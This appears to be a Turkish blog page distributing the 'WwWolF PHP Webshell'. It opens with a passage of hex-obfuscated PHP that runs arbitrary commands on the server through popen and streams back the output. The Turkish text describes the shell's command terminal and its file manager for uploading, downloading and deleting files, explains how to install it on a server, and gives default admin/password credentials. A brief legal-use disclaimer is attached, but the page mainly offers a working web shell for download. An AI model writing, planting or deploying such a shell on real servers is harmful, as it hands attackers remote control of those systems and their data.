x63\x6d\x64";echo"<b>";e(${${"\x47\x4cO\x42A\x4c\x53"}["\x70vh\x63d\x71j"]});echo"\x3c/b\x3e\n";if(DIRECTORY_SEPARATOR=="/"){${"\x47\x4cO\x42\x41L\x53"}["gv\x64br\x65\x78"]="\x63\x6d\x64";${"\x47\x4c\x4fBA\x4c\x53"}["xn\x6b\x67\x73\x6doj\x63\x73d\x6c"]="\x70";${${"\x47L\x4f\x42A\x4c\x53"}["x\x6ek\x67s\x6dojcsd\x6c"]}=popen("ex\x65c 2>\x26\x31\x3b ".${${"G\x4c\x4fB\x41L\x53"}["\x67vd\x62\x72e\x78"]},"r");}else{$dikdtfvyf="\x70";${$dikdtfvyf}=popen("c\x6d\x64\x20/C \"".${${"\x47\x4c\x4fB\x41LS"}["\x69\x68\x74e\x74\x6a\x6a\x66\x70r"]}."\x22 2\x3e\x261","r");}while(!feof(${${"\x47\x4c\x4f\x42ALS"}["b\x76f\x79xv\x63\x63k\x6df"]})){echo htmlspecialchars(fread(${${"\x47\x4c\x4f\x42AL\x53"}["\x64\x65\x69\x68p\x6boe\x6c\x6d\x61"]},4096),ENT_QUOTES);@flush();}}echo"</pr\x65\x3e";exit;
?>
WwWolF PHP Webshell

Özellikler

  • Ufak Boyut: Webshell yalnızca birkaç satırlık PHP kodundan oluşur.
  • Minimal Bağımlılıklar: PHP’nin fonksiyon çoğunluğu varsayılan olarak engellenmediği veya kaldırılmadığı sürece çalışabilmesi için ek gereksinimler bulunmaz.
  • Birden Fazla Otorizasyon Yöntemi: İhtiyaç duyduğunuz koruma seviyesine göre kullanıcı adı/şifre veya IP adresi bazlı kısıtlama seçenekleri mevcuttur. Bunları tek tek veya birlikte devreye alabilir, devre dışı bırakabilirsiniz.
  • Kolaylaştırılmış Terminal Özelliği: Terminal yine de system(), exec(), vb. engellenmişse çalışmaz, ancak shell_exec() kullanarak sunucu tarafında komut yürütmeye imkân tanır.
  • Basit Dosya Yöneticisi: Dosya/dizin listeleme, değiştirme, silme, indirme ve yükleme fonksiyonları içerir.

Kurulum

Webshell’i dilediğiniz bir yere (örneğin wwwolf.php olarak) yükleyin. İsterseniz, güvenlik ayarlarını düzenlemek için doğrudan kaynağındaki (kaynak kodun içindeki) yapılandırma seçeneklerini değiştirebilirsiniz.

Kullanım

  1. Web tarayıcınızdan wwwolf.php adresine gidin.
  2. Eğer etkinleştirdiyseniz, kullanıcı adı/şifre veya IP doğrulaması devreye girer.
  3. Açılan sayfalarda, terminal komutlarını girebilir veya basit dosya yöneticisi arayüzünü kullanarak dosyalar üzerinde işlem yapabilirsiniz.

Güvenlik Uyarısı

  • Bu betiğin zararsız olduğunu düşünmeyin: Sahip olduğu fonksiyonlarla, ele geçirilmiş bir sunucuda kritik işlemleri yapabilir. Her zaman şifre koruması ve IP kısıtlaması gibi yöntemlerle kullanımını sınırlandırın.
  • Asla yetkilendirmesi olmayan kullanıcılara bu webshell’e doğrudan erişim vermeyin.

Yapılandırma

Webshell dosyasında (örneğin wwwolf.php içinde), üst kısımda değiştirilebilecek seçenekler mevcuttur: 

/* ========== Configuration Begin ========== */

$USERNAME = 'admin';                // Kullanıcı adı
$PASSWORD = 'password';             // Şifre
$AUTHORIZED_IPS = array();          // IP tabanlı kısıtlama (örn. array('1.2.3.4', '5.6.7.0/24'))

/* ========== Configuration End ========== */

$USERNAME ve $PASSWORD değerlerini değiştirebilir, $AUTHORIZED_IPS dizisine izin verilecek IP adreslerini (veya alt ağları) ekleyebilirsiniz. Bir IP kısıtlaması etkinleştirmek istemiyorsanız, dizi boş bırakılabilir.

Lisans

Bu projeye ilişkin lisans bilgisi, orijinal depo içerisinde belirtildiği şekildedir. Genellikle MIT veya benzeri açık kaynak lisansları kullanılır. Daha detaylı bilgi için projenin LICENSE dosyasını inceleyin.

Sorumluluk Reddi

Bu proje her ne kadar yönetici (root) ayrıcalıklarına sahip olmadan çalışsa da, zararlı niyetlerle kullanıldığında çok büyük riskler barındırabilir. Lütfen bu betiği sadece kendi sorumluluğunuz altında ve yasal ortamlarda test/inceleme amacıyla kullanın.

Tags
Shell Downloadd

Shell Downloadd

#HackShell, #PHP, #CyberSecurity, #EtikHacking, #SunucuTestleri, #GüvenlikAnalizi, #ZafiyetTaraması, #EğitimAmaçlı, #ShellScript, #HafifYazılım, #Otomasyon, #YasalKullanım, #SiberGüvenlik

    Daha fazla göster

    Yorum Gönder

    0Yorumlar

    Yorum Gönder (0)

    #buttons=(Accept !) #days=(20)

    Web sitemiz deneyiminizi geliştirmek için çerezler kullanır. Şimdi Kontrol Edin
    Accept !
    Diğer uygulamalarla paylaşın
    Copy Post Link